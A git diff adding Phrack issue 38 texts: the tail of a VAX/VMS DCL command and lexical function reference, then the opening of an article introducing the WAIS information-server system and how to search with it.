+  /OWNER_UIC            /PROCESSOR              /PROTECTION
+  /QUOTA                /REBUILD                /RECORDZIDE
+  /SHADOW               /SHARE                  /SYSTEM
+  /UNLOAD               /WINDOWS                /WRITE
+
+
+ON condition THEM dcl_command
+  Defines the DCL command to be executed when a command or program executed
+  with a command procedure encounters an error condition or is interrupted by
+  the user pressing <Ctrl-Y>.
+
+
+OPEN logical_name[:] file_spec
+  Opens a file for input/output.  The OPEN command assigns a logical name to
+  the file and places the name in the process logical name table.
+
+  Qualifiers:
+  /APPEND       /ERROR       /READ       /SHARE       /WRITE
+
+
+PATCH file_spec
+  Invokes the VAX/VMS Patch Utility to patch an executable image, shareable
+  image or device driver image.
+
+  Qualifiers:
+  /ABSOLUTE     /JOURNAL      /NEW_VERSION      /OUTPUT     /UPDATE
+  /VOLUME
+
+
+PHONE [phone_command]
+  Invokes the VAX/VMS Phone Utility.  PHONE provides the facility for you to
+  communicate with other users on the system or for any other VAX/VMS system
+  connected to your system via a DECnet network.
+
+  Qualifiers:
+  /SCROLL       /SWITCH_HOOK      /VIEWPORT_SIZE
+
+
+PRINT file_spec[,...]
+  Queues-up one or more files for printing.
+
+  Qualifiers:
+  /AFTER        /BACKUP                 /BEFORE         /BURST
+  /BY_OWNER     /CHARACTERISTICS        /CONFIRM        /COPIES
+  /CREATED      /DELETE                 /DEVICE         /EXCLUDE
+  /EXPIRED      /FEED                   /FLAG           /FORM
+  /HEADER       /HOLD                   /IDENTIFY       /JOB_COUNT
+  /LOWERCASE    /MODIFIED               /NAME           /NOTE
+  /NOTIFY       /OPERATOR               /PAGES          /PARAMETERS
+  /PASSALL      /PRIORITY               /QUEUE          /REMOTE
+  /RESTART      /SETUP                  /SINCE          /SPACE
+  /TRAILER      /USER
+
+
+PURGE [file_spec[,...]]
+  Deletes all but the highest versions of the specified files.
+
+  Qualifiers:
+  /BACKUP       /BEFORE        /BY_OWNER       /CONFIRM       /CREATED
+  /ERASE        /EXCLUDE       /EXPIRED        /KEEP          /LOG
+  /MODIFIED     /SINCE
+
+
+READ logical_name[:] symbol_name
+  The READ command inputs a single record from the specified input file and
+  assigns the contents of the record to the specified symbol name.
+
+  Qualifiers:
+  /DELETE       /END_OF_FILE      /ERROR        /INDEX       /KEY
+  /MATCH        /NOLOCK           /PROMPT       /TIME_OUT
+
+
+RECALL [command_specifier]
+  Recalls previously entered commands for reprocessing or correcting.
+
+  Qualifier:
+  /ALL
+
+
+RENAME input_file_spec[,...] output_file_spec
+  Modifies the file specification of an existing disk file or disk directory.
+
+  Qualifiers:
+  /BACKUP       /BEFORE       /BY_OWNER      /CONFIRM       /CREATED
+  /EXCLUDE      /EXPIRED      /LOG           /MODIFIED      /NEW_VERSION
+  /SINCE
+
+
+REPLY ["message"]
+  Allows a system operator to communicate with system users.
+
+  Qualifiers:
+  /ABORT        /ALL            /BELL                /BLANK_TAPE
+  /DISABLE      /ENABLE         /INITIALIZE_TAPE     /LOG
+  /NODE         /NOTIFY         /PENDING             /SHUTDOWN
+  /STATUS       /TEMPORARY      /TERMINAL            /TO
+  /URGENT       /USERNAME       /WAIT
+
+
+REQUEST "message"
+  Writes a message on the system operator's terminal, and optionally requests a
+  reply.
+
+  Qualifiers:
+  /REPLY        /TO
+
+
+RETURN [status_code]
+  Terminates a GOSUB statement and returns control to the command following the
+  GOSUB command.
+
+
+RUN
+  Performs the following functions:
+  o  Places an image into execution in the process.
+  o  Creates a subprocess or detached process to run a specified image.
+
+
+RUNOFF
+  Performs the following functions:
+  o  Invokes the DIGITAL Standard Runoff text formatter to format one or more
+     ASCII files.
+  o  Invokes the DIGITAL Standard Runoff text formatter to generate a table of
+     contents for one or more ASCII files.
+  o  Invokes the DIGITAL Standard Runoff text formatter to generate an index
+     for one or more ASCII files.
+
+
+SEARCH file_spec[,...] search_string[,...]
+  Searches one or more files for the specified string(s) and lists all the
+  lines containing occurrences of the strings.
+
+  Qualifiers:
+  /EXACT        /EXCLUDE        /FORMAT       /HEADING        /LOG
+  /MATCH        /NUMBERS        /OUTPUT       /REMAINING      /STATISTICS
+  /WINDOW
+
+
+SET ACCOUNTING
+  Enables or disables logging various accounting activities in the system
+  accounting log file SYS$MANAGER:ACCOUNTING.DAT.  The SET ACCOUNTING command
+  is also used to close the current accounting log file and to open a new one
+  with a higher version number.
+
+  Qualifiers:
+  /DISABLE      /ENABLE       /NEW_FILE
+
+
+SET ACL object_name
+  Allows you to modify the ACL (access control list) of a VMS object.
+
+  Qualifiers:
+  /ACL          /AFTER          /BEFORE         /BY_OWNER       /CONFIRM
+  /CREATED      /DEFAULT        /DELETE         /EDIT           /EXCLUDE
+  /JOURNAL      /KEEP           /LIKE           /LOG            /MODE
+  /NEW          /OBJECT_TYPE    /RECOVER        /REPLACE        /SINCE
+
+SET AUDIT
+  Enables or disables VAX/VMS security auditing.
+
+  Qualifiers:
+  /ALARM        /DISABLE        /ENABLE
+
+
+SET BROADCAST = (class_name[,...])
+  Allows you to block out various terminal messages from being broadcast to
+  your terminal.
+
+
+SET COMMAND [file_spec[,...]]
+  Invokes the VAX/VMS Command Definition Utility to add, delete or replace
+  commands in your process command table or a specified command table file.
+
+  Qualifiers:
+  /DELETE       /LISTING        /OBJECT         /OUTPUT         /REPLACE
+  /TABLE
+
+
+SET [NO]CONTROL[=(T,Y)]
+  Defines whether or not control will pass to the command language interpreter
+  when <Ctrl-Y> is pressed and whether process statistics will be displayed
+  when <Ctrl-T> is pressed.
+
+
+SET DAY
+  Used to reset the default day type specified in the user authorization file
+  for the current day.
+
+  Qualifiers:
+  /DEFAULT      /LOG            /PRIMARY        /SECONDARY
+
+
+SET DEFAULT device_name:directory_spec
+  Changes the default device and/or directory specification.  The new default
+  is used with all subsequent file operations that do not explicitly include a
+  device or directory name.
+
+
+SET DEVICE device_name[:]
+  Establishes a printer or terminal as a spooled device, or sets the error
+  logging status of a device.
+
+  Qualifiers:
+  /AVAILABLE    /DUAL_PORT      /ERROR_LOGGING     /LOG
+  /SPOOLED
+
+
+SET DIRECTORY directory_spec[,...]
+  Modifies directory characteristics.
+
+  Qualifiers:
+  /BACKUP       /BEFORE         /BY_OWNER       /CONFIRM
+  /CREATED      /EXCLUDE        /EXPIRED        /LOG
+  /MODIFIED     /OWNER_UIC      /SINCE          /VERSION_LIMIT
+
+
+SET FILE file_spec[,...]
+  Modifies file characteristics.
+
+  Qualifiers:
+  /BACKUP               /BEFORE         /BY_OWNER           /CONFIRM
+  /CREATED              /DATA_CHECK     /END_OF_FILE        /ENTER
+  /ERASE_ON_DELETE      /EXCLUDE        /EXPIRATION_DATE    /EXTENSION
+  /GLOBAL_BUFFER        /LOG            /NODIRECTORY        /OWNER_UIC
+  /PROTECTION           /REMOVE         /SINCE              /UNLOCK
+  /TRUNCATE             /VERSION_LIMIT
+
+
+SET HOST node_name
+  Connects your terminal, via your host processor, to another processor in a
+  DECnet network.
+
+  Qualifiers:
+  /LOG          /DTE          /HSC
+
+
+SET KEY
+  Changes the current key definition state.  Keys are defined by the DEFINE/KEY
+  command.
+
+  Qualifiers:
+  /LOG          /STATE
+
+
+SET LOGINS
+  Defines the number of users who may gain access to the system.  This command
+  also displays the current interactive level.
+
+  Qualifiers:
+  /INTERACTIVE
+
+
+SET MAGTAPE device_name[:]
+  Defines default characteristics to be associated with a magnetic tape device
+  for subsequent file operations.
+
+  Qualifiers:
+  /DENSITY      /END_OF_FILE       /LOG       /LOGSOFT        /REWIND
+  /SKIP         /UNLOAD
+
+
+SET MESSAGE [file_spec]
+  Allows you to specify the format of messages, or to override or supplement
+  system messages.
+
+  Qualifiers:
+  /DELETE      /FACILITY      /IDENTIFICATION       /SEVERITY      /TEXT
+
+
+SET [NO]ON
+  Controls command interpreter error checking.  If SET NOON is in effect, the
+  command interpreter will ignore errors in a command procedure and continue
+  processing.
+
+
+SET OUTPUT_RATE [=delta_time]
+  Defines the rate at which output will be written to a batch job log file.
+
+
+SET PASSWORD
+  Permits to change password in a VAX/VMS account
+
+  Qualifiers:
+  /GENERATE     /SECONDARY      /SYSTEM
+
+
+SET PRINTER printer_name[:]
+  Defines characteristics for a line printer.
+
+  Qualifiers:
+  /CR           /FALLBACK     /FF           /LA11        /LA180
+  /LOWERCASE    /LOG          /LP11         /PAGE        /PASSALL
+  /PRINTALL     /TAB          /TRUNCATE     /UNKNOWN     /UPPERCASE
+  /WIDTH        /WRAP
+
+
+SET PROCESS [process_name]
+  Modifies execution characteristics associated with the named process for the
+  current login session.  If a process is not specified, changes are made to
+  the current process.
+
+  Qualifiers:
+  /CPU          /DUMP           /IDENTIFICATION         /NAME
+  /PRIORITY     /PRIVILEGES     /RESOURCE_WAIT          /RESUME
+  /SUSPEND      /SWAPPING
+
+
+SET PROMPT [=string]
+  Defines a new DCL prompt for your process.  The default prompt is a dollar
+  sign ($).
+
+  Qualifier:
+  /CARRIAGE_CONTROL
+
+
+SET PROTECTION [=(code)] file_spec[,...]
+  Modifies the protection applied to a particular file or to a group of files.
+  The protection of a file limits the access available to various groups of
+  system users.  When used without a file specification, it establishes the
+  default protection for all the files subsequently created during the login
+  session.  May also be used to modify the protection of a non-file-oriented
+  device.
+
+  Qualifiers:
+  /CONFIRM      /LOG    /PROTECTION     /DEFAULT      /DEVICE
+
+
+SET QUEUE queue_name
+  Used to modify the current status or attributes of a queue, or to change the
+  current status or attributes of a job that is not currently executing in a
+  queue.
+
+  Qualifiers:
+  /BASE_PRIOTITY     /BLOCK_LIMIT    /CHARACTERISTICS     /CPUDEFAULT
+  /CPUMAXIMUM        /DEFAULT        /DISABLE_SWAPPING    /ENABLE_GENERIC
+  /FORM_MOUNTED      /JOB_LIMIT      /OWNER_UIC           /PROTECTION
+  /RECORD_BLOCKING   /RETAIN         /SCHEDULE            /SEPARATE
+  /WSDEFAULT         /WSEXTENT       /WSQUOTA             /ENTRY
+
+
+SET RESTART_VALUE=string
+  Defines a test value for restarting portions of a batch job after a system
+  failure.
+
+
+SET RIGHTS_LIST id_name[,...]
+  Allows you to modify the process or system rights list.
+
+  Qualifiers:
+  /ATTRIBUTES   /DISABLE   /ENABLE    /IDENTIFICATION   /PROCESS
+  /SYSTEM
+
+
+SET RMS_DEFAULT
+  Used to set default values for the multiblock and multibuffer counts, network
+  transfer sizes, prologue level and extend quantity used by RMS for various
+  file operations.
+
+  Qualifiers:
+  /BLOCK_COUNT            /BUFFER_COUNT    /DISK
+  /EXTEND_QUANTITY        /INDEXED         /MAGTAPE
+  /NETWORK_BLOCK_COUNT    /PROLOG          /RELATIVE
+  /SEQUENTIAL             /SYSTEM          /UNIT_RECORD
+
+
+SET SYMBOL
+  Controls access to local and global symbols within command procedures.
+
+  Qualifier:
+  /SCOPE
+
+
+SET TERMINAL [device_name[:]]
+  Modifies interpretation of various terminal characteristics.
+
+  Qualifiers:
+  /ADVANCED_VIDEO       /ALTYPEAHD              /ANSI_CRT
+  /APPLICATION_KEYPAD   /AUTOBAUD               /BLOCK_MODE
+  /BRDCSTMBX            /BROADCAST              /CRFILL
+  /DEC_CRT              /DEVICE_TYPE            /DIALUP
+  /DISCONNECT           /DISMISS                /DMA
+  /ECHO                 /EDIT_MODE              /EIGHT_BIT
+  /ESCAPE               /FALLBACK               /FRAME
+  /FORM                 /FULLDUP                /HALFDUP
+  /HANGUP               /HARDCOPY               /HOSTSYNC
+  /INQUIRE              /INSERT                 /LFFILL
+  /LINE_EDITING         /LOCAL_ECHO             /LOWERCASE
+  /MANUAL               /MODEM                  /NUMERIC_KEYPAD
+  /OVERSTRIKE           /PAGE                   /PARITY
+  /PASTHRU              /PERMANENT              /PRINTER_PORT
+  /PROTOCOL             /READSYNC               /REGIS
+  /SCOPE                /SET_SPEED              /SECURE_SERVER
+  /SIXEL_GRAPHICS       /SOFT_CHARACTERS        /SPEED
+  /SWITCH               /SYSPASSWORD            /TAB
+  /TTSYNC               /TYPE_AHEAD             /UNKNOWN
+  /UPPERCASE            /WIDTH                  /WRAP
+
+
+SET TIME [=time]
+  Resets the system time to be used with all time-dependent activities in the
+  VAX/VMS operating system.
+
+
+SET UIC uic
+  Establishes a new default user identification code (UIC).
+
+
+SET [NO]VERIFY [=([NO]PROCEDURE,[NO]IMAGE)]
+  Controls whether command and data lines, in a command procedure, are
+  displayed as they are processed.
+
+
+SET VOLUME device_spec[:][,...]
+  Modifies the characteristics of a mounted Files-11 volume.
+
+  Qualifiers:
+  /ACCESSED         /DATA_CHECK             /ERASE_ON_DELETE
+  /EXTENSION        /FILE_PROTECTION        /HIGHWATER_MARKING
+  /LABEL            /LOG                    /MOUNT_VERIFICATION
+  /OWNER_UIC        /PROTECTION             /REBUILD
+  /RETENTION        /UNLOAD                 /USER_NAME
+  /WINDOWS
+
+
+SET WORKING_SET
+  Sets the default working set size for the current process, or sets an upper
+  limit to which the working set size can be changed by an image that the
+  process executes.
+
+  Qualifiers:
+  /ADJUST      /EXTENT       /LIMIT       /LOG      /QUOTA
+
+
+SHOW ACCOUNTING
+  Displays items for which accounting is enabled.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW ACL
+  Permits you to display the access control list (ACL) of a VAX/VMS object.
+
+  Qualifier:
+  /OBJECT_TYPE
+
+
+SHOW AUDIT
+  Supplies a display that identifies enable security auditing features and the
+  events that they will report.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW BROADCAST
+  Displays messages classes that currently are being affected by the SET
+  BROADCAST command.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW DEFAULT
+  Displays the current default device and directory specification, along with
+  any equivalence strings that have been defined.
+
+
+SHOW DEVICES [device_name[:]]
+  Displays the status of a device on the running VAX/VMS system.
+
+  Qualifiers:
+  /ALLOCATED    /BRIEF      /FILES        /FULL       /MOUNTED
+  /OUTPUT       /SYSTEM     /WINDOWS      /SERVED
+
+
+SHOW ERROR
+  Displays an error count for all devices with an error count greater than 0.
+
+  Qualifiers:
+  /FULL         /OUTPUT
+
+
+SHOW KEY [key_name]
+  Displays the key definition for the specified key.
+
+  Qualifiers:
+  /ALL       /BRIEF      /DIRECTORY       /FULL     /STATE
+
+
+SHOW LOGICAL [logical_name[:],[...]]
+  Displays logical names from one or more logical name tables, or displays the
+  equivalence string(s) assigned to the specified logical names(s).
+
+  Qualifiers:
+  /ACCESS_MODE        /ALL          /DESCENDANTS      /FULL
+  /GROUP              /JOB          /OUTPUT           /PROCESS
+  /STRUCTURE          /SYSTEM       /TABLE
+
+
+SHOE MAGTAPE device_name[:]
+  Displays the characteristics and status of a specified magnetic tape device.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW MEMORY
+  Displays availability and use of memory-related resources.
+
+  Qualifiers:
+  /ALL                 /FILES     /FULL       /OUTPUT
+  /PHYSICAL_PAGES      /POOL      /SLOTS
+
+
+SHOW NETWORK
+  Displays node information about the DECnet network of which your host
+  processor is a member.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW PRINTER device_name[:]
+  Displays characteristics defined for a system printer.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW PROCESS [process_name]
+  Displays information about a process and any of its subprocesses.
+
+  Qualifiers:
+  /ACCOUNTING   /ALL            /CONTINUOUS     /IDENTIFICATION    /MEMORY
+  /OUTPUT       /PRIVILEGES     /QUOTAS         /SUBPROCESSES
+
+
+SHOW PROTECTION
+  Displays the file protection that will be applied to all new files created
+  during the current login session.
+
+
+SHOW QUEUE [queue_name]
+  Displays information about queues and the jobs currently in queue.
+
+  Qualifiers:
+  /ALL          /BATCH          /BRIEF          /DEVICE
+  /FILES        /FULL           /OUTPUT         /CHARACTERISTICS
+  /FORM
+
+
+SHOW QUOTA
+  Displays the disk quota that is currently authorized for a specific user on a
+  specific disk.
+
+  Qualifiers:
+  /DISK         /USER
+
+
+SHOW RMS_DEFAULT
+  Displays the default multiblock count, multibuffer count, network transfer
+  size, prologue level and extend quantity that RMS will use for file
+  operations.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW STATUS
+  Displays status information for the current process.
+
+
+SHOW SYMBOL [symbol_name]
+  Displays the value of a local or global symbol.
+
+  Qualifiers:
+  /ALL          /GLOBAL         /LOCAL          /LOG
+
+
+SHOW SYSTEM
+  Displays a list of processes currently running on a system.
+
+  Qualifiers:
+  /BATCH        /FULL         /NETWORK      /OUTPUT     /PROCESS
+  /SUBPROCESS
+
+
+SHOW TERMINAL [device_name[:]]
+  Displays the characteristics of a specified terminal.
+
+  Qualifiers:
+  /OUTPUT       /PERMANENT
+
+
+SHOW TIME
+  Displays the current system date and time.
+
+
+SHOW TRANSLATION logical_name
+  Searches the logical name tables for a specified logical name, then returns
+  the first equivalence name of the match found.
+
+  Qualifier:
+  /TABLE
+
+
+SHOW USERS [username]
+  Displays a list of all users currently using the system and their terminal
+  names, usernames and their process identification codes.
+
+  Qualifier:
+  /OUTPUT
+
+
+SHOW WORKING_SET
+  Displays the current working set limit, quota and extent assigned to the
+  current process.
+
+  Qualifier:
+  /OUTPUT
+
+
+SORT input_file_spec[,...] output_file_spec
+  Invokes the VAX/VMS Sort Utility to reorder records in a file into a defined
+  sequence.
+
+  Qualifiers:
+  /COLLATING_SEQUENCE   /DUPLICATES             /KEY
+  /PROCESS              /SPECIFICATION          /STABLE
+  /STATISTICS           /WORK_FILES             /FORMAT
+
+  Output File Qualifiers:
+  /ALLOCATION           /BUCKET_SIZE            /CONTIGUOUS
+  /FORMAT               /INDEXED_SEQUENTIAL     /OVERLAY
+  /RELATIVE             /SEQUENTIAL
+
+
+SPAWN [command_string]
+  Creates a subprocess to the current process.
+
+  Qualifiers:
+  /CARRIAGE CONTROL     /CLI            /INPUT
+  /KEYPAD               /LOG            /LOGICAL_NAMES
+  /NOTIFY               /OUTPUT         /PROCESS
+  /PROMPT               /SYMBOLS        /TABLE
+  /WAIT
+
+
+START/QUEUE queue_name
+  Starts or restarts the specified queue.
+
+
+STOP process_name
+  Specifies the name of a process to be deleted from the system.  If the
+  /IDENTIFICATION qualifier is used, the process name is ignored.
+
+  Qualifier:
+  /IDENTIFICATION
+
+
+STOP/QUEUE queue_name[:]
+  Causes the specified queue to pause.
+
+  Qualifiers:
+  /ABORT        /ENTRY          /MANAGER
+  /NEXT         /REQUEUE        /RESET
+
+
+SUBMIT file_spec[,...]
+  Enters a command procedure(s) into a batch queue.
+
+  Qualifiers:
+  /AFTER                /BACKUP         /BEFORE         /BY_OWNER
+  /CHARACTERISTICS      /CLI            /CONFIRM        /CPUTIME
+  /CREATED              /DELETE         /EXCLUDE        /EXPIRED
+  /HOLD                 /IDENTIFY       /KEEP           /LOG_FILE
+  /MODIFIED             /NAME           /NOTIFY         /PARAMETERS
+  /PRINTER              /PRIORITY       /QUEUE          /REMOTE
+  /RESTART              /SINCE          /USER           /WSDEFAULT
+  /WSEXTENT             /WSQUOTA
+
+
+SYNCHRONIZE [job_name]
+  Places the process issuing the command into a wait state until the specified
+  job completes execution.
+
+  Qualifiers:
+  /ENTRY        /QUEUE
+
+
+TYPE file_spec[,...]
+  Displays the contents of a file or group of files on the current output
+  device (normally your terminal screen).
+
+  Qualifiers:
+  /BACKUP       /BEFORE        /BY_OWNER       /CONFIRM       /CREATED
+  /EXCLUDE      /EXPIRED       /MODIFIED       /OUTPUT        /PAGE
+  /SINCE
+
+
+UNLOCK file_spec[,...]
+  Makes a file that has been made inaccessible as a result of being improperly
+  closed accessible.
+
+  Qualifiers:
+  /CONFIRM      /LOG
+
+
+WAIT delta_time
+  Places the current process in a wait state until a specified period of time
+  has passed.
+
+
+WRITE logical_name expression[,...]
+  Writes the specified data record to the output file indicated by the logical
+  name.
+
+  Qualifiers:
+  /ERROR        /SYMBOL         /UPDATE
+
+
+                 <:=- Part E : Lexical Function Reference -=:>
+
+
+ Introduction
+ ~~~~~~~~~~~~
+Part F is a Lexical Function Reference.  Parameters for the lexicals are in
+parenthesis after the function name, and parenthesis are required whether or
+not the lexical function requires parameters.
+
+
+ Lexical Function Reference
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+F$CVSI (bit_position, width, string)
+  Used to extract bit fields from a character string.  The result is converted
+  to a signed integer value.
+
+
+F$CFTIME (input_time, output_time, field)
+  Converts absolute or combination time to the format yyyy-mm-dd
+  hh:mmm:ss.cc.  This function can also be used to return information about an
+  absolute, combination, or delta time string.
+
+
+F$CVUI (bit_position, width, string)
+  Extracts bit fields from a character string and converts the result to an
+  unsigned integer value.
+
+
+F$DIRECTORY ()
+  Returns the default directory name as a character string.
+
+
+F$EDIT (string, edit_list)
+  Used to edit a character string based on the parameters specified in the
+  edit_list.
+
+
+F$ELEMENT (element_number, delimiter, string)
+  Extracts an element from a character string in which the elements are
+  separated by some specified delimiter.
+
+
+F$ENVIRONMENT (item)
+  Returns information about the DCL command environment.
+
+
+F$EXTRACT (offset, length, string)
+  Extracts a substring from a given character string.
+
+
+F$FAO (control_string[,arg1,art2...arg15])
+  Calls the $FAO system service to convert a specified control string to
+  formatted ASCII.  This function may be used to insert variable character
+  string data into an output string or convert integer values to ASCII and
+  substitute the result into the output string.
+
+
+F$FILE_ATTRIBUTES (file_spec, item)
+  Returns attribute information for the specified file.
+
+
+F$GETDVI (device, item)
+  Calls the $GETDVI system service to return an item of information on a
+  specified device.  This function allows a process to obtain information for a
+  device to which the process has not necessarily allocated or assigned a
+  channel.
+
+
+F$GETJPI (pid, item)
+  Calls the $GETJPI system service to return status and identification
+  information about the running system or about a node in the VAXcluster (if
+  the system is a VAXcluster).
+
+
+F$IDENTIFIER (identifier, conversion_type)
+  Converts an identifier into its integer equivalent, or vice versa.  An
+  identifier is a name or number that identifies a category of data resource
+  users.  The system uses identifiers to determine user access to a system
+  resource.
+
+
+F$INTEGER (expression)
+  Returns the integer value of the result of the specified expression.
+
+
+F$LENGTH (string)
+  Returns the length of a specified character string.
+
+
+F$LOCATE (substring, string)
+  Locates a character or character substring within a string and returns its
+  offset within the string.  If the character or character substring is not
+  found, the function returns the length of the string that was searched.
+
+
+F$MESSAGE (status_code)
+  Returns a character string containing the message associated with a system
+  status code.
+
+
+F$MODE ()
+  Returns a character string displaying the mode in which a process is
+  executing.
+
+
+F$PARSE (file_spec[,related_spec][,field][,parse_type])
+  Calls the $PARSE RMS service to parse a file specification and return either
+  its expanded file specification or a particular file specification field that
+  you have specified.
+
+
+F$PID (context_symbol)
+  Returns a process identification number (PID), and updates the context symbol
+  to point to the current position in the system's process list.
+
+
+F$PRIVILEGE (priv_states)
+  Returns a value of true or false depending on whether your current process
+  privileges match the privileges listed in the parameter argument.
+
+
+F$PROCESS ()
+  Obtains the current process name as a character string.
+
+
+F$SEARCH (file_spec[,stream_id])
+  Calls the $SEARCH RMS service to search a directory and return the full file
+  specification for a specified file.
+
+
+F$SETPRV (priv_states)
+  Returns a list of keywords indicating current user privileges.  In addition,
+  this function may be used to call the $SETPRV system service to enable or
+  disable specified user privileges.  The return string indicates the status of
+  the user privileges before any changes have been made with the F$SETPRV
+  function.
+
+
+F$STRING (expression)
+  Returns the character string equivalent of the result of the specified
+  expression.
+
+
+F$TIME ()
+  Returns the current date and time string.
+
+
+F$TRNLNM (logical_name[,table][,index][,mode][,case][,item])
+  Translates a logical name to its equivalence string, or returns the requested
+  attributes of the logical name.  The equivalence string is not checked to
+  determine if it is a logical name or not.
+
+
+F$TYPE (symbol_name)
+  Returns the data type of a symbol.
+
+
+F$USER ()
+  Returns the user identification code (UIC), in named format, for the current
+  user.  The F$USER function has no arguments.
+
+
+F$VERIFY ([procedure_value][,image_value])
+  Returns an integer value which indicates whether procedure verification mode
+  is currently on or off.  If used with arguments, the F$VERIFY function can
+  turn verification mode on or off.  You must include the parentheses after the
+  F$VERIFY function, whether or not you specify arguments.
+
+
+ Default File Types
+ ~~~~~~~~~~~~~~~~~~
+These file types are conventions set by DEC and may not be followed by other
+software companies.
+
+ Type    Contents
+ ~~~~    ~~~~~~~~
+ ANL     Output file from the ANALYZE command
+ BAS     Source input file for BASIC compiler
+ CLD     Command line interpreter command description file
+ COM     Command procedure file
+ DAT     Data file (input or output)
+ DIF     Output file from the DIFFERENCES command
+ DIR     Subdirectory
+ DIS     MAIL distribution list
+ DMP     Output from the DUMP command
+ EDT     EDT editor initialization file
+ EXE     VAX/VMS executable program created with the LINK command
+ FDL     File Definition language file created with the EDIT/FDL or
+         ANALYZE/RMS/FDL command
+ FOR     Source input for FORTRAN compiler
+ HLB     Help text library
+ HLP     Help text file, usually as source input to help text library file
+ JNL     EDT editor journal file
+ LIS     List file created by an assembler or compiler
+ LOG     Information file created by a batch job, DECnet, etc.
+ MAI     Mail message storage file
+ MAR     Source input file for MACRO assembler
+ MLB     MAXCRO source library
+ OBJ     Intermediate object file created by a compiler or assembler
+ OLB     Object module library
+ OPT     Option input file for the LINK command
+ STB     Symbol table
+ SYS     System image
+ TJL     Journal file created by the TPU editor
+ TLB     Text library
+ TMP     General purpose temporary file
+ TPU     Command input file for the TPU editor
+ TXT     Text file
+
+
+ Device Names
+ ~~~~~~~~~~~~
+The following are common VAX/VMS device codes and their corresponding types.
+
+ Code    Device Type
+ ~~~~    ~~~~~~~~~~~
+ CS      Console boot/storage device
+ DA      RC25 (25 MB fixed/25 MB removable)
+ DB      RP05, RP06 disk
+ DD      TU58 tape
+ DJ      RA60 disk
+ DL      RL02 disk
+ DR      RM03 RM05, RM80, RP07 disk
+ DU      RA80, RA81, RA82 disk
+ DX      RX01 floppy
+ DY      RX02 floppy
+ LC      Line printer device on DMF32
+ LP      Line printer device on LP11
+ LT      Local area terminal (LAT)
+ MB      Mailbox device
+ MF      TU78 magnetic tape drive
+ MS      TS11 magnetic tape drive
+ MT      TU45, TU77, TE16 magnetic tape drive
+ MU      TK50, TA78, TA81, TU81 magnetic tape drive
+ NL      Null device
+ OP      Operators console device
+ RT      Remote terminal (via DECnet)
+ TT      Interactive terminal device
+ TX      Interactive terminal device
+ VT      Virtual terminal
+ XE      DEUNA
+ XQ      DEQNA
+_______________________________________________________________________________
diff --git a/phrack38/8.txt b/phrack38/8.txt
new file mode 100644
index 0000000..2fcf880
--- /dev/null
+++ b/phrack38/8.txt
@@ -0,0 +1,242 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 8 of 15
+
+                         Wide Area Information Servers
+
+                     How Do I Use It and Why Should I Care?
+
+                                   by Mycroft
+                            mycroft@gnu.ai.mit.edu
+
+
+ Introduction
+ ~~~~~~~~~~~~
+     This file serves as an introduction to "information servers," and in
+particular to the WAIS system from Thinking Machines Corp.
+
+
+ Overview
+ ~~~~~~~~
+     The Wide Area Information Server (or WAIS) system provides a way for
+people ("providers") to make information sources ("sources") accessible via a
+network, with a very simple interface to search for and retrieve particular
+pieces of information ("documents").
+
+     Essentially, you pick a source and specify a few keywords, and the WAIS
+search engine tries to find documents that match those specific keywords.  Each
+document is scored, and the highest scoring documents are listed first.  In
+addition, there is a mechanism ("relevance feedback") for feeding information
+back to the server about which documents are most interesting to you, and
+having it narrow the search based on this.
+
+     To summarize:  WAIS gives you a fast and easy way to search vast amounts
+of information, and to provide access to it to other users on a network.
+
+
+ Why Should I Care?
+ ~~~~~~~~~~~~~~~~~~
+     You should care because I, through the goodness of my heart, have made all
+the issues of Phrack Inc. available through WAIS.  :-)  I'll soon be adding
+issues of the LOD/H TJ, NARC, NIA, Worldview, and a lot of other files.  If
+anyone would care to donate files, I'd appreciate it.
+
+     There are also many other sources currently available that will probably
+be of interest to you.
+
+
+ Step 1:  Compiling A Client
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     To use WAIS, you need a client program.  There are currently 4 available
+that I know of:
+
+     Xwais - for the X Window System
+     SWAIS - terminal-based
+     Mac WAIStation
+     NeXT WAIStation
+     (I vaguely recall something about a Windows client.)
+
+     Xwais and SWAIS both come in the standard distribution, with the search
+and index engines.
+
+     You can FTP any of the above from think.com, in directory /wais.  The
+relevant files are:
+
+     wais-8-b4.tar.Z - contains the search and index engines, as well Xwais and
+                       SWAIS
+     WAIStation-0-63.sit.hqx - the Mac WAIStation
+     WAIStation-NeXT-1.0.tar.Z - the NeXT WAIStation
+
+     After you choose a client and get the source, compile it.  There are
+decent directions on how to do this in each package.
+
+
+ Step 2:  Finding An Information Source
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     To find a source, you just do a search in the "directory of servers" -- a
+source containing pointers to all the registered WAIS sources on the net.
+
+     For example, if you're using Xwais:
+
+(I am *not* going to go into the details of how to use the scrollbars and
+whatnot.  If you're stuck, ask a Mac weenie for help.)
+
+ Tell me about:
+.----------------------------------------------------------------. .------.
+|phrack                                                          | |Search|
+`----------------------------------------------------------------' `------'
+ In Sources:                Similar to:
+.------------------------. .----------------------------------------------.
+|directory-of-servers.src| |                                              |
+`------------------------' `----------------------------------------------'
+.----------. .-------------. .------------+ .---------------. .----. .----.
+|Add Source| |Delete Source| |Add Document| |Delete Document| |Help| |Done|
+`----------' `-------------' `------------' `---------------' `----' `----'
+            .+------------------------------------------------------------.
+ Resulting  || 1000   551 phrack.src   /proj/wais/wais-sources/           |
+ documents: ||                                                            |
+.----.      ||                                                            |
+|View|      ||                                                            |
+`----'      `+------------------------------------------------------------'
+        .-----------------------------------------------------------------.
+Status: |Found 1 document.                                                |
+        `-----------------------------------------------------------------'
+
+     The lines in the "Resulting documents:" window break down into three
+parts:
+
+     Score    -- How well it matched your query, as compared to other
+                 documents.
+     Size     -- <In bytes> of the document.
+     Headline -- The "headline" is generated while building the index.
+
+     For source files, it's broken down by filename and path.  For the p/h/c/a
+server, it's the title of the article, the authors, and the issue and file
+number.
+
+      So double-click on the document, and you'll get another window (shortened
+a bit):
+
+        Source Edit
+
+        Name: phrack.src
+      Server: hal.gnu.ai.mit.edu
+     Service: 8000
